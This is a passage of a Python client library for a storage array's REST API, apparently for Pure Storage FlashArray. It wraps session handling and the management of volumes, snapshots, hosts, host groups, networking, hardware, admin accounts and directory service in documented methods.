elif response.status_code == 401 and reestablish_session:
self._start_session()
return self._request(method, path, data, False)
elif response.status_code == 450 and self._renegotiate_rest_version:
# Purity REST API version is incompatible.
old_version = self._rest_version
self._rest_version = self._choose_rest_version()
if old_version == self._rest_version:
# Got 450 error, but the rest version was supported
# Something really unexpected happened.
raise PureHTTPError(self._target, str(self._rest_version), response)
return self._request(method, path, data, reestablish_session)
else:
raise PureHTTPError(self._target, str(self._rest_version), response)
#
# REST API session management methods
#
def _check_rest_version(self, version):
"""Validate a REST API version is supported by the library and target array."""
version = str(version)
if version not in self.supported_rest_versions:
msg = "Library is incompatible with REST API version {0}"
raise ValueError(msg.format(version))
array_rest_versions = self._list_available_rest_versions()
if version not in array_rest_versions:
msg = "Array is incompatible with REST API version {0}"
raise ValueError(msg.format(version))
return LooseVersion(version)
def _choose_rest_version(self):
"""Return the newest REST API version supported by target array."""
versions = self._list_available_rest_versions()
versions = [LooseVersion(x) for x in versions if x in self.supported_rest_versions]
if versions:
return max(versions)
else:
raise PureError(
"Library is incompatible with all REST API versions supported"
"by the target array.")
def _list_available_rest_versions(self):
"""Return a list of the REST API versions supported by the array"""
url = "https://{0}/api/api_version".format(self._target)
data = self._request("GET", url, reestablish_session=False)
return data["version"]
def _obtain_api_token(self, username, password):
"""Use username and password to obtain and return an API token."""
data = self._request("POST", "auth/apitoken",
{"username": username, "password": password},
reestablish_session=False)
return data["api_token"]
def _start_session(self):
"""Start a REST API session."""
self._request("POST", "auth/session", {"api_token": self._api_token},
reestablish_session=False)
def get_rest_version(self):
"""Get the REST API version being used by this object.
:returns: The REST API version.
:rtype: str
"""
return str(self._rest_version)
def invalidate_cookie(self):
"""End the REST API session by invalidating the current session cookie.
.. note::
Calling any other methods again creates a new cookie. This method
is intended to be called when the FlashArray object is no longer
needed.
"""
self._request("DELETE", "auth/session")
#
# Array management methods
#
def _set_console_lock(self, **kwargs):
return self._request("PUT", "array/console_lock", kwargs)
def enable_console_lock(self):
"""Enable root lockout from the array at the physical console.
:returns: A dictionary mapping "console_lock" to "enabled".
:rtype: ResponseDict
"""
return self._set_console_lock(enabled=True)
def disable_console_lock(self):
"""Disable root lockout from the array at the physical console.
:returns: A dictionary mapping "console_lock" to "disabled".
:rtype: ResponseDict
"""
return self._set_console_lock(enabled=False)
def get(self, **kwargs):
"""Get array attributes.
:param \*\*kwargs: See the REST API Guide on your array for the
documentation on the request:
**GET array**
:type \*\*kwargs: optional
:returns: A dictionary describing the array or a list of dictionaries
describing multiple array attributes, depending on the
arguments passed in.
:rtype: ResponseDict or ResponseList
"""
return self._request("GET", "array", kwargs)
def get_console_lock_status(self):
"""Get console-lock status of the array.
:returns: A dictionary mapping "console_lock" to "enabled" if
console_lock is enabled, else "disabled".
:rtype: ResponseDict
"""
return self._request("GET", "array/console_lock")
def rename(self, name):
"""Rename the array.
:param name: The new name for the array.
:param type: str
:returns: A dictionary mapping "array_name" to name.
:rtype: ResponseDict
"""
return self.set(name=name)
def set(self, **kwargs):
"""Set array attributes.
:param \*\*kwargs: See the REST API Guide on your array for the
documentation on the request:
**PUT array**
:type \*\*kwargs: optional
:returns: A dictionary mapping the parameter that was set to its
new value.
:rtype: ResponseDict
"""
return self._request("PUT", "array", kwargs)
#
# Volume and snapshot management methods
#
def _set_volume(self, volume, **kwargs):
"""Perform actions on a volume and return a dictionary describing it."""
return self._request("PUT", "volume/{0}".format(volume), kwargs)
def create_snapshot(self, volume, **kwargs):
"""Create a snapshot of the given volume.
:param volume: Name of the volume of which to take a snapshot.
:type volume: str
:param \*\*kwargs: See the REST API Guide on your array for the
documentation on the request:
**POST volume**
:type \*\*kwargs: optional
:returns: A dictionary describing the new snapshot.
:rtype: ResponseDict
"""
return self.create_snapshots([volume], **kwargs)[0]
def create_snapshots(self, volumes, **kwargs):
"""Create snapshots of the listed volumes.
:param volumes: List of names of the volumes to snapshot.
:type volumes: list of str
:param \*\*kwargs: See the REST API Guide on your array for the
documentation on the request:
**POST volume**
:type \*\*kwargs: optional
:returns: A list of dictionaries describing the new snapshots.
:rtype: ResponseDict
"""
data = {"source": volumes, "snap": True}
data.update(kwargs)
return self._request("POST", "volume", data)
def create_volume(self, volume, size):
"""Create a volume and return a dictionary describing it.
:param volume: Name of the volume to be created.
:type volume: str
:param size: Size in bytes, or string representing the size of the
volume to be created.
:type size: int or str
:returns: A dictionary describing the created volume.
:rtype: ResponseDict
.. note::
The maximum volume size supported is 4 petabytes (4 * 2^50).
.. note::
If size is an int, it must be a multiple of 512.
.. note::
If size is a string, it must consist of an integer followed by a
valid suffix.
Accepted Suffixes
====== ======== ======
Suffix Size Bytes
====== ======== ======
S Sector (2^9)
K Kilobyte (2^10)
M Megabyte (2^20)
G Gigabyte (2^30)
T Terabyte (2^40)
P Petabyte (2^50)
====== ======== ======
"""
return self._request("POST", "volume/{0}".format(volume), {"size":size})
def copy_volume(self, source, dest, **kwargs):
"""Clone a volume and return a dictionary describing the new volume.
:param source: Name of the source volume.
:type source: str
:param dest: Name of the destination volume.
:type dest: str
:param \*\*kwargs: See the REST API Guide on your array for the
documentation on the request:
**POST volume/:volume**
:type \*\*kwargs: optional
:returns: A dictionary describing the destination volume.
:rtype: ResponseDict
"""
data = {"source": source}
data.update(kwargs)
return self._request("POST", "volume/{0}".format(dest), data)
def destroy_volume(self, volume):
"""Destroy an existing volume or snapshot.
:param volume: Name of the volume to be destroyed.
:type volume: str
:returns: A dictionary mapping "name" to volume.
:rtype: ResponseDict
.. warnings also::
This operation may cause a loss of data. The destroyed volume can
be recovered during the 24 hours immediately following its
destruction unless it is eradicated before then.
"""
return self._request("DELETE", "volume/{0}".format(volume))
def eradicate_volume(self, volume):
"""Eradicate a destroyed volume or snapshot.
:param volume: Name of the volume to be eradicated.
:type volume: str
:returns: A dictionary mapping "name" to volume.
:rtype: ResponseDict
.. note::
This operation fails if volume is not destroyed.
.. warnings also::
This operation may permanently erase data and the volume cannot
be recovered.
"""
return self._request("DELETE", "volume/{0}".format(volume),
{"eradicate": True})
def extend_volume(self, volume, size):
"""Extend a volume to a new, larger size.
:param volume: Name of the volume to be extended.
:type volume: str
:type size: int or str
:param size: Size in bytes, or string representing the size of the
volume to be created.
:returns: A dictionary mapping "name" to volume and "size" to the volume's
new size in bytes.
:rtype: ResponseDict
.. note::
The new size must be larger than the volume's old size.
.. note::
The maximum volume size supported is 4 petabytes (4 * 2^50).
.. note::
If size is an int, it must be a multiple of 512.
.. note::
If size is a string, it must consist of an integer followed by a
valid suffix.
Accepted Suffixes
====== ======== ======
Suffix Size Bytes
====== ======== ======
S Sector (2^9)
K Kilobyte (2^10)
M Megabyte (2^20)
G Gigabyte (2^30)
T Terabyte (2^40)
P Petabyte (2^50)
====== ======== ======
"""
return self._set_volume(volume, size=size, truncate=False)
def get_volume(self, volume, **kwargs):
"""Return a dictionary describing a volume or snapshot.
:param volume: Name of the volume to get information about.
:type volume: str
:param \*\*kwargs: See the REST API Guide on your array for the
documentation on the request:
**GET volume/:volume**
:type \*\*kwargs: optional
:returns: A list describing snapshots of the volume if the paramater
snap is passed as True, else a dictionary describing the
volume.
:rtype: ResponseDict or ResponseList
"""
return self._request("GET", "volume/{0}".format(volume), kwargs)
def add_volume(self, volume, pgroup):
"""Add a volume to a pgroup.
:param volume: Name of the volume to add to pgroup.
:type volume: str
:param pgroup: pgroup to which to add volume.
:type pgroup: str
:returns: A dictionary mapping "name" to volume and "protection_group"
to pgroup.
:rtype: ResponseDict
.. note::
Requires use of REST API 1.7 or later.
"""
return self._request("POST", "volume/{0}/pgroup/{1}".format(volume, pgroup))
def remove_volume(self, volume, pgroup):
"""Remove a volume from a pgroup.
:param volume: Name of the volume to remove from pgroup.
:type volume: str
:param pgroup: pgroup from which to remove volume.
:type pgroup: str
:returns: A dictionary mapping "name" to volume and "protection_group"
to pgroup.
:rtype: ResponseDict
.. note::
Requires use of REST API 1.7 or later.
"""
return self._request("DELETE", "volume/{0}/pgroup/{1}".format(volume, pgroup))
def list_volume_block_differences(self, volume, **kwargs):
"""Return a list of block differences for the specified volume.
:param volume: Name of the volume to get information about.
:type volume: str
:param \*\*kwargs: See the REST API Guide on your array for the
documentation on the request:
**GET volume/:volume/diff**
:type \*\*kwargs: optional
:returns: A list of dictionaries describing block differences between
the specified volume and the base volume.
:rtype: ResponseList
.. note::
Requires use of REST API 1.3 or later.
"""
return self._request("GET", "volume/{0}/diff".format(volume), kwargs)
def list_volume_private_connections(self, volume, **kwargs):
"""Return a list of dictionaries describing connected hosts.
:param volume: Name of the volume for which to list the private connections.
:type volume: str
:returns: A list of dictionaries describing the volume's private connections.
:rtype: ResponseList
"""
return self._request("GET", "volume/{0}/host".format(volume), kwargs)
def list_volume_shared_connections(self, volume, **kwargs):
"""Return a list of dictionaries describing connected host groups.
:param volume: Name of the volume for which to list the shared connections.
:type volume: str
:returns: A list of dictionaries describing the volume's shared connections.
:rtype: ResponseList
"""
return self._request("GET", "volume/{0}/hgroup".format(volume), kwargs)
def list_volumes(self, **kwargs):
"""Return a list of dictionaries describing each volume.
:param \*\*kwargs: See the REST API Guide on your array for the
documentation on the request:
**GET volume**
:type \*\*kwargs: optional
:returns: A list of dictionaries describing each volume.
:rtype: ResponseList
"""
return self._request("GET", "volume", kwargs)
def rename_volume(self, volume, name):
"""Rename a volume.
:param volume: Name of the volume to be renamed.
:type volume: str
:param name: New name of volume to be renamed.
:type name: str
:returns: A dictionary mapping "name" to name.
:rtype: ResponseDict
.. note::
All snapshots of the named volume also are renamed to the new name,
followed by its previous suffix.
"""
return self._set_volume(volume, name=name)
def recover_volume(self, volume):
"""Recover a volume that has been destroyed but not eradicated.
:param volume: Name of volume to be recovered.
:type volume: str
:returns: A dictionary mapping "name" to volume.
:rtype: ResponseDict
.. note::
This must be done within the 24 hours following a volume's
destruction or it will be eradicated.
"""
return self._set_volume(volume, action="recover")
def truncate_volume(self, volume, size):
"""Truncate a volume to a new, smaller size.
:param volume: Name of the volume to truncate.
:type volume: str
:param size: Size in bytes, or string representing the size of the
volume to be created.
:type size: int or str
:returns: A dictionary mapping "name" to volume and "size" to the
volume's new size in bytes.
:rtype: ResponseDict
.. warnings also::
Data may be irretrievably lost in this operation.
.. note::
A snapshot of the volume in its previous state is taken and
immediately destroyed, but it is available for recovery for
the 24 hours following the truncation.
"""
return self._set_volume(volume, size=size, truncate=True)
#
# Host management methods
#
def connect_host(self, host, volume, **kwargs):
"""Create a connection between a host and a volume.
:param host: Name of host to connect to volume.
:type host: str
:param volume: Name of volume to connect to host.
:type volume: str
:param \*\*kwargs: See the REST API Guide on your array for the
documentation on the request:
**POST host/:host/volume/:volume**
:type \*\*kwargs: optional
:returns: A dictionary describing the connection between the host and volume.
:rtype: ResponseDict
"""
return self._request(
"POST", "host/{0}/volume/{1}".format(host, volume), kwargs)
def create_host(self, host, **kwargs):
"""Create a host are return a dictionary describing it.
:param host: Name of host to be created.
:type host: str
:param \*\*kwargs: See the REST API Guide on your array for the
documentation on the request:
**POST host/:host**
:type \*\*kwargs: optional
:returns: A dictionary describing the created host.
:rtype: ResponseDict
"""
return self._request("POST", "host/{0}".format(host), kwargs)
def delete_host(self, host):
"""Delete a host.
:param host: Name of host to be deleted.
:type host: str
:returns: A dictionary mapping "name" to host.
:rtype: ResponseDict
"""
return self._request("DELETE", "host/{0}".format(host))
def disconnect_host(self, host, volume):
"""Delete a connection between a host and a volume.
:param host: Name of host to be disconnected from volume.
:type host: str
:param volume: Name of volume to be disconnected from host.
:type volume: str
:returns: A dictionary mapping "name" to host and "vol" to volume.
:rtype: ResponseDict
"""
return self._request("DELETE", "host/{0}/volume/{1}".format(host,
volume))
def get_host(self, host, **kwargs):
"""Return a dictionary describing a host.
:param host: Name of host to get information about.
:type host: str
:param \*\*kwargs: See the REST API Guide on your array for the
documentation on the request:
**GET host/:host**
:type \*\*kwargs: optional
:returns: A dictionary describing host.
:rtype: ResponseDict
"""
return self._request("GET", "host/{0}".format(host), kwargs)
def add_host(self, host, pgroup):
"""Add a host to a pgroup.
:param host: Name of the host to add to pgroup.
:type host: str
:param pgroup: pgroup to which to add host.
:type pgroup: str
:returns: A dictionary mapping "name" to host and "protection_group"
to pgroup.
:rtype: ResponseDict
"""
return self._request("POST", "host/{0}/pgroup/{1}".format(host, pgroup))
def remove_host(self, host, pgroup):
"""Remove a host from a pgroup.
:param host: Name of the host to remove from pgroup.
:type host: str
:param pgroup: pgroup from which to remove host.
:type pgroup: str
:returns: A dictionary mapping "name" to host and "protection_group"
to pgroup.
:rtype: ResponseDict
.. note::
Requires use of REST API 1.7 or later.
"""
return self._request("DELETE", "host/{0}/pgroup/{1}".format(host, pgroup))
def list_host_connections(self, host, **kwargs):
"""Return a list of dictionaries describing connected volumes.
:type host: str
Name of host for which to list connections.
:type \*\*kwargs: optional
:param \*\*kwargs: See the REST API Guide on your array for the
documentation on the request:
**GET host/:host/volume**
:returns: A list of dictionaries describing host's connections.
:rtype: ResponseList
"""
return self._request("GET", "host/{0}/volume".format(host), kwargs)
def list_hosts(self, **kwargs):
"""Return a list of dictionaries describing each host.
:type \*\*kwargs: optional
:param \*\*kwargs: See the REST API Guide on your array for the
documentation on the request:
**GET host**
:returns: A list of dictionaries describing each host.
:rtype: ResponseList
"""
return self._request("GET", "host", kwargs)
def rename_host(self, host, name):
"""Rename a host.
:param host: Name of host to be renamed.
:type host: str
:param name: New name of host to be renamed.
:type name: str
:returns: A dictionary mapping "name" to name.
:rtype: ResponseDict
"""
return self.set_host(host, name=name)
def set_host(self, host, **kwargs):
"""Set an attribute of a host.
:param host: Name of host for which to set attribute.
:type host: str
:param \*\*kwargs: See the REST API Guide on your array for the
documentation on the request:
**PUT host/:host**
:type \*\*kwargs: optional
:returns: A dictionary describing host.
:rtype: ResponseDict
"""
return self._request("PUT", "host/{0}".format(host), kwargs)
#
# Host group management methods
#
def connect_hgroup(self, hgroup, volume, **kwargs):
"""Create a shared connection between a host group and a volume.
:param hgroup: Name of hgroup to connect to volume.
:type hgroup: str
:param volume: Name of volume to connect to hgroup.
:type volume: str
:param \*\*kwargs: See the REST API Guide on your array for the
documentation on the request:
**POST hgroup/:hgroup/volume/:volume**
:type \*\*kwargs: optional
:returns: A dictionary describing the connection between the hgroup and volume.
:rtype: ResponseDict
"""
return self._request(
"POST", "hgroup/{0}/volume/{1}".format(hgroup, volume), kwargs)
def create_hgroup(self, hgroup, **kwargs):
"""Create a host group and return a dictionary describing it.
:param hgroup: Name of hgroup to be created.
:type hgroup: str
:param \*\*kwargs: See the REST API Guide on your array for the
documentation on the request:
**POST hgroup/:hgroup**
:type \*\*kwargs: optional
:returns: A dictionary describing the created hgroup
:rtype: ResponseDict
"""
return self._request("POST", "hgroup/{0}".format(hgroup), kwargs)
def delete_hgroup(self, hgroup):
"""Delete a host group.
:param hgroup: Name of the hgroup to be deleted.
:type hgroup: str
:returns: A dictionary mapping "name" to hgroup.
:rtype: ResponseDict
"""
return self._request("DELETE", "hgroup/{0}".format(hgroup))
def disconnect_hgroup(self, hgroup, volume):
"""Delete a shared connection between a host group and a volume.
:param hgroup: Name of hgroup to be disconnected from volume.
:type hgroup: str
:param volume: Name of volume to be disconnected from hgroup.
:type volume: str
:returns: A dictionary mapping "name" to hgroup and "vol" to volume.
:rtype: ResponseDict
"""
return self._request("DELETE",
"hgroup/{0}/volume/{1}".format(hgroup, volume))
def get_hgroup(self, hgroup, **kwargs):
"""Return a list of dictionaries describing a host group.
:param hgroup: Name of hgroup to get information about.
:type hgroup: str
:param \*\*kwargs: See the REST API Guide on your array for the
documentation on the request:
**GET hgroup/:hgroup**
:type \*\*kwargs: optional
:returns: A dictionary describing hgroup.
:rtype: ResponseDict
"""
return self._request("GET", "hgroup/{0}".format(hgroup), kwargs)
def add_hgroup(self, hgroup, pgroup):
"""Add an hgroup to a pgroup.
:param hgroup: Name of the hgroup to add to pgroup.
:type hgroup: str
:param pgroup: pgroup to which to add hgroup.
:type pgroup: str
:returns: A dictionary mapping "name" to hgroup and "protection_group"
to pgroup.
:rtype: ResponseDict
"""
return self._request("POST", "hgroup/{0}/pgroup/{1}".format(hgroup, pgroup))
def remove_hgroup(self, hgroup, pgroup):
"""Remove an hgroup from a pgroup.
:param hgroup: Name of the hgroup to remove from pgroup.
:type hgroup: str
:param pgroup: pgroup from which to remove hgroup.
:type pgroup: str
:returns: A dictionary mapping "name" to hgroup and "protection_group"
to pgroup.
:rtype: ResponseDict
.. note::
Requires use of REST API 1.7 or later.
"""
return self._request("DELETE", "hgroup/{0}/pgroup/{1}".format(hgroup, pgroup))
def list_hgroup_connections(self, hgroup):
"""Return a list of dictionaries describing shared connected volumes.
:param hgroup: Name of hgroup for which to list connections.
:type hgroup: str
:returns: A list of dictionaries describing hgroup's connections.
:rtype: ResponseList
"""
return self._request("GET", "hgroup/{0}/volume".format(hgroup))
def list_hgroups(self, **kwargs):
"""Return a list of dictionaries describing each host group.
:param \*\*kwargs: See the REST API Guide on your array for the
documentation on the request:
**GET hgroup**
:type \*\*kwargs: optional
:returns: A list of dictionaries describing each hgroup.
:rtype: ResponseList
"""
return self._request("GET", "hgroup", kwargs)
def rename_hgroup(self, hgroup, name):
"""Rename a host group.
:param hgroup: Name of hgroup to be renamed.
:type hgroup: str
:param name: New name of hgroup to be renamed.
:type name: str
:returns: A dictionary mapping "name" to name.
:rtype: ResponseDict
"""
return self.set_hgroup(hgroup, name=name)
def set_hgroup(self, hgroup, **kwargs):
"""Set an attribute of a host group.
:param hgroup: Name of hgroup for which to set attribute.
:type hgroup: str
:param \*\*kwargs: See the REST API Guide on your array for the
documentation on the request:
**PUT hgroup/:hgroup**
:type \*\*kwargs: optional
:returns: A dictionary describing hgroup.
:rtype: ResponseDict
"""
return self._request("PUT", "hgroup/{0}".format(hgroup), kwargs)
#
# Network management methods
#
def disable_network_interface(self, interface):
"""Disable a network interface.
:param interface: Name of network interface to be disabled.
:type interface: str
:returns: A dictionary describing the interface.
:rtype: ResponseDict
"""
return self.set_network_interface(interface, enabled=False)
def enable_network_interface(self, interface):
"""Enable a network interface.
:param interface: Name of network interface to be enabled.
:type interface: str
:returns: A dictionary describing the interface.
:rtype: ResponseDict
"""
return self.set_network_interface(interface, enabled=True)
def get_network_interface(self, interface):
"""Return a dictionary describing a network interface.
:param interface: Name of network interface to get information about.
:type interface: str
:returns: A dictionary describing the interface.
:rtype: ResponseDict
"""
return self._request("GET", "network/{0}".format(interface))
def list_network_interfaces(self):
"""Get a list of dictionaries describing network interfaces.
:returns: A list of dictionaries describing each network interface.
:rtype: ResponseList
"""
return self._request("GET", "network")
def set_network_interface(self, interface, **kwargs):
"""Set network interface attributes.
:param interface: Name of network interface for which to set attribute.
:type interface: str
:param \*\*kwargs: See the REST API Guide on your array for the
documentation on the request:
**PUT network/:network_component**
:type \*\*kwargs: optional
:returns: A dictionary describing the interface.
:rtype: ResponseDict
"""
return self._request("PUT", "network/{0}".format(interface), kwargs)
def create_subnet(self, subnet, prefix, **kwargs):
"""Create a subnet.
:param subnet: Name of subnet to be created.
:type subnet: str
:param prefix: Routing prefix of subnet to be created.
:type prefix: str
:param \*\*kwargs: See the REST API Guide on your array for the
documentation on the request:
**POST subnet/:subnet**
:type \*\*kwargs: optional
:returns: A dictionary describing the created subnet.
:rtype: ResponseDict
.. note::
prefix should be specified as an IPv4 CIDR address.
("xxx.xxx.xxx.xxx/nn", representing prefix and prefix length)
.. note::
Requires use of REST API 1.5 or later.
"""
data = {"prefix": prefix}
data.update(kwargs)
return self._request("POST", "subnet/{0}".format(subnet), data)
def delete_subnet(self, subnet):
"""Delete a subnet.
:param subnet: Name of the subnet to be deleted.
:type subnet: str
:returns: A dictionary mapping "name" to subnet.
:rtype: ResponseDict
.. note::
Requires use of REST API 1.5 or later.
"""
return self._request("DELETE", "subnet/{0}".format(subnet))
def disable_subnet(self, subnet):
"""Disable a subnet.
:param subnet: Name of subnet to be disabled.
:type subnet: str
:returns: A dictionary describing the subnet.
:rtype: ResponseDict
.. note::
Requires use of REST API 1.5 or later.
"""
return self.set_subnet(subnet, enabled=False)
def enable_subnet(self, subnet):
"""Enable a subnet.
:param subnet: Name of subnet to be enabled.
:type subnet: str
:returns: A dictionary describing the subnet.
:rtype: ResponseDict
.. note::
Requires use of REST API 1.5 or later.
"""
return self.set_subnet(subnet, enabled=True)
def get_subnet(self, subnet):
"""Return a dictionary describing a subnet.
:param subnet: Name of the subnet to get information about.
:type subnet: str
:returns: A dictionary describing the subnet.
:rtype: ResponseDict
.. note::
Requires use of REST API 1.5 or later.
"""
return self._request("GET", "subnet/{0}".format(subnet))
def list_subnets(self, **kwargs):
"""Get a list of dictionaries describing subnets.
:param \*\*kwargs: See the REST API Guide on your array for the
documentation on the request:
**GET subnet**
:type \*\*kwargs: optional
:returns: A list of dictionaries describing each subnet.
:rtype: ResponseList
.. note::
Requires use of REST API 1.5 or later.
"""
return self._request("GET", "subnet", kwargs)
def rename_subnet(self, subnet, name):
"""Rename a subnet.
:param subnet: Current name of the subnet to be renamed.
:type subnet: str
:param name: New name of the subnet to be renamed.
:type name: str
:returns: A dictionary describing the renamed subnet.
:rtype: ResponseDict
.. note::
Requires use of REST API 1.5 or later.
"""
return self.set_subnet(subnet, name=name)
def set_subnet(self, subnet, **kwargs):
"""Set subnet attributes.
:param subnet: Name of subnet for which to set attribute.
:type subnet: str
:param \*\*kwargs: See the REST API Guide on your array for the
documentation on the request:
**PUT subnet/:subnet**
:type \*\*kwargs: optional
:returns: A dictionary describing the subnet.
:rtype: ResponseDict
.. note::
Requires use of REST API 1.5 or later.
"""
return self._request("PUT", "subnet/{0}".format(subnet), kwargs)
def create_vlan_interface(self, interface, subnet, **kwargs):
"""Create a vlan interface
:param interface: Name of interface to be created.
:type interface: str
:param subnet: Subnet associated with interface to be created
:type subnet: str
:param \*\*kwargs: See the REST API Guide on your array for the
documentation on the request:
**POST network/vif/:vlan_interface**
:type \*\*kwargs: optional
:returns: A dictionary describing the created interface
:rtype: ResponseDict
.. note::
Requires use of REST API 1.5 or later.
"""
data = {"subnet": subnet}
data.update(kwargs)
return self._request("POST", "network/vif/{0}".format(interface), data)
def delete_vlan_interface(self, interface):
"""Delete a vlan interface.
:param interface: Name of the interface to be deleted.
:type interface: str
:returns: A dictionary mapping "name" to interface.
:rtype: ResponseDict
.. note::
Requires use of REST API 1.5 or later.
"""
return self._request("DELETE", "network/{0}".format(interface))
# DNS methods
def get_dns(self):
"""Get current DNS settings.
:returns: A dictionary describing current DNS settings.
:rtype: ResponseDict
"""
return self._request("GET", "dns")
def set_dns(self, **kwargs):
"""Set DNS settings.
:param \*\*kwargs: See the REST API Guide on your array for the
documentation on the request:
**PUT dns**
:type \*\*kwargs: optional
:returns: A dictionary describing current DNS settings.
:rtype: ResponseDict
"""
return self._request("PUT", "dns", kwargs)
# ports
def list_ports(self, **kwargs):
"""List SAN ports.
:param \*\*kwargs: See the REST API Guide on your array for the
documentation on the request:
**GET port**
:type \*\*kwargs: optional
:returns: A list of dictionaries describing each port.
:rtype: ResponseList
"""
return self._request("GET", "port", kwargs)
#
# Hardware management methods
#
def get_drive(self, drive):
"""Get drive attributes.
:param drive: Name of drive to get information about.
:type drive: str
:returns: A dictionary describing drive.
:rtype: ResponseDict
"""
return self._request("GET", "drive/{0}".format(drive))
def list_drives(self):
"""Returns a list of dictionaries describing SSD and NVRAM modules.
:returns: A list of dictionaries describing each drive.
:rtype: ResponseList
"""
return self._request("GET", "drive")
def get_hardware(self, component, **kwargs):
"""Returns a dictionary describing a hardware component.
:param component: Name of hardware component to get information about.
:type component: str
:param \*\*kwargs: See the REST API Guide on your array for the
documentation on the request:
**GET hardware/:component**
:type \*\*kwargs: optional
:returns: A dictionary describing component.
:rtype: ResponseDict
"""
return self._request("GET", "hardware/{0}".format(component), kwargs)
def list_hardware(self, **kwargs):
"""Returns a list of dictionaries describing hardware.
:param \*\*kwargs: See the REST API Guide on your array for the
documentation on the request:
**GET hardware**
:type \*\*kwargs: optional
:returns: A list of dictionaries describing each hardware component.
:rtype: ResponseList
"""
return self._request("GET", "hardware", kwargs)
def set_hardware(self, component, **kwargs):
"""Set an attribute of a hardware component.
:param component: Name of component for which to set attribute.
:type component: str
:param \*\*kwargs: See the REST API Guide on your array for the
documentation on the request:
**PUT hardware/:component**
:type \*\*kwargs: optional
:returns: A dictionary describing component.
:rtype: ResponseDict
"""
return self._request("PUT", "hardware/{0}".format(component), kwargs)
#
# User-management methods
#
def _list_admin(self, **kwargs):
"""Return a list of dictionaries describing remote access.
For the arguments you can provide to this method, see the REST API Guide
on your array for the documentation on the request:
GET admin.
"""
return self._request("GET", "admin", kwargs)
def _set_admin(self, admin, **kwargs):
"""Set an attribute of an admin.
For the arguments you can provide to this method, see the REST API Guide
on your array for the documentation on the request:
PUT admin/:user.
"""
return self._request("PUT", "admin/{0}".format(admin), kwargs)
def create_api_token(self, admin, **kwargs):
"""Create an API token for an admin.
:param admin: Name of admin for whom to create an API token.
:type admin: str
:param \*\*kwargs: See the REST API Guide on your array for the
documentation on the request:
**POST admin/:admin/apitoken**
:type \*\*kwargs: optional
:returns: A dictionary describing the new API token.
:rtype: ResponseDict
"""
return self._request("POST", "admin/{0}/apitoken".format(admin), kwargs)
def delete_api_token(self, admin):
"""Delete the API token of an admin.
:param admin: Name of admin whose API token is to be deleted.
:type admin: str
:returns: A dictionary mapping "name" to admin and "api_token" to None.
:rtype: ResponseDict
"""
return self._request("DELETE", "admin/{0}/apitoken".format(admin))
def get_publickey(self, admin):
"""Returns a dictionary describing an admin's public key.
:param admin: Name of admin whose public key to get.
:type admin: str
:returns: A dictionary mapping "name" to admin and "publickey" to "\*\*\*\*".
:rtype: ResponseDict
"""
return self._request("GET", "admin/{0}".format(admin),
{"publickey": True})
def get_api_token(self, admin, **kwargs):
"""Return a dictionary describing an admin's API token.
:param admin: Name of admin whose API token to get.
:type admin: str
:param \*\*kwargs: See the REST API Guide on your array for the
documentation on the request:
**GET admin/:admin/apitoken**
:type \*\*kwargs: optional
:returns: A dictionary describing admin's API token.
:rtype: ResponseDict
"""
return self._request("GET", "admin/{0}/apitoken".format(admin))
def list_publickeys(self):
"""Return a list of dictionaries describing public keys.
:returns: A list of dictionaries mapping "name" to a username and
"publickey" to "\*\*\*\*" for each admin with a public
key set.
:rtype: ResponseList
"""
return self._list_admin(publickey=True)
def list_api_tokens(self, **kwargs):
"""Return a list of dictionaries describing REST API tokens.
:param \*\*kwargs: See the REST API Guide on your array for the
documentation on the request:
**GET admin**
:type \*\*kwargs: optional
:returns: A list of dictionaries describing the API token of each admin
with an API token set.
:rtype: ResponseList
.. note::
The API tokens are replaced with "\*\*\*\*" unless the parameter
expose is passed as True.
"""
return self._list_admin(api_token=True, **kwargs)
def refresh_admin(self, admin, **kwargs):
"""Refresh the admin permission cache for the specified admin.
:param admin: Name of admin whose permission cache is to be refreshed.
:type admin: str
:param \*\*kwargs: See the REST API Guide on your array for the
documentation on the request:
**GET admin**
:type \*\*kwargs: optional
:returns: A dictionary mapping "name" to admin and "role" to the admin's role.
:rtype: ResponseDict
.. note::
Setting the optional parameter clear to True only clears the
cache without doing an LDAP lookup to get new permissions.
"""
return self._set_admin(admin, action="refresh", **kwargs)
def refresh_admins(self):
"""Clear the admin permission cache.
:returns: A dictionary mapping "name" to "[ALL]" and "role" to None.
:rtype: ResponseDict
.. note::
Does not immediately do any LDAP lookups to get new permissions.
"""
return self._request("PUT", "admin",
{"action": "refresh", "clear": True})
def set_publickey(self, admin, key):
"""Set the public key associated with an admin.
:param admin: Name of admin whose public key is to be set.
:type admin: str
:param key: New public key for admin.
:type key: str
:returns: A dictionary mapping "name" to admin and "publickey"
to "\*\*\*\*"
:rtype: ResponseDict
"""
return self._set_admin(admin, publickey=key)
def set_password(self, admin, new_password, old_password):
"""Set an admin's password.
:param admin: Name of admin whose password is to be set.
:type admin: str
:param new_password: New password for admin.
:type new_password: str
:param old_password: Current password of admin.
:type old_password: str
:returns: A dictionary mapping "name" to admin.
:rtype: ResponseDict
"""
return self._set_admin(admin, password=new_password,
old_password=old_password)
# Directory Service methods
def disable_directory_service(self, check_peer=False):
"""Disable the directory service.
:param check_peer: If True, disables server authenticity
enforcement. If False, disables directory
service integration.
:type check_peer: bool, optional
:returns: A dictionary describing the status of the directory service.
:rtype: ResponseDict
"""
if check_peer:
return self.set_directory_service(check_peer=False)
return self.set_directory_service(enabled=False)
def enable_directory_service(self, check_peer=False):
"""Enable the directory service.
:param check_peer: If True, enables server authenticity
enforcement. If False, enables directory
service integration.
:type check_peer: bool, optional
:returns: A dictionary describing the status of the directory service.
:rtype: ResponseDict
"""
if check_peer:
return self.set_directory_service(check_peer=True)
return self.set_directory_service(enabled=True)
def get_directory_service(self, **kwargs):
"""Return a dictionary describing directory service configuration.
:param \*\*kwargs: See the REST API Guide on your array for the
documentation on the request:
**GET directoryservice**
:type \*\*kwargs: optional
:returns: A dictionary describing the status of the directory service.
:rtype: ResponseDict
"""
return self._request("GET", "directoryservice", kwargs)
def set_directory_service(self, **kwargs):
"""Set an attribute of the directory service configuration.
:param \*\*kwargs: See the REST API Guide on your array for the
documentation on the request:
**PUT directoryservice**
:type \*\*kwargs: optional
:returns: A dictionary describing the status of the directory service.
:rtype: ResponseDict
"""
return self._request("PUT", "directoryservice", kwargs)
def test_directory_service(self):
"""Test the directory service.
:returns: A dictionary mapping "output" to the output of the directory
service test.
:rtype: ResponseDict
"""
return self.set_directory_service(action="test")
#
# Support related methods
#
def _set_phonehome(self, **kwargs):
return self._request("PUT", "array/phonehome", kwargs)
def _set_remote_assist(self, **kwargs):
return self._request("PUT", "array/remoteassist", kwargs)
def disable_phonehome(self):
"""Disable hourly phonehome.
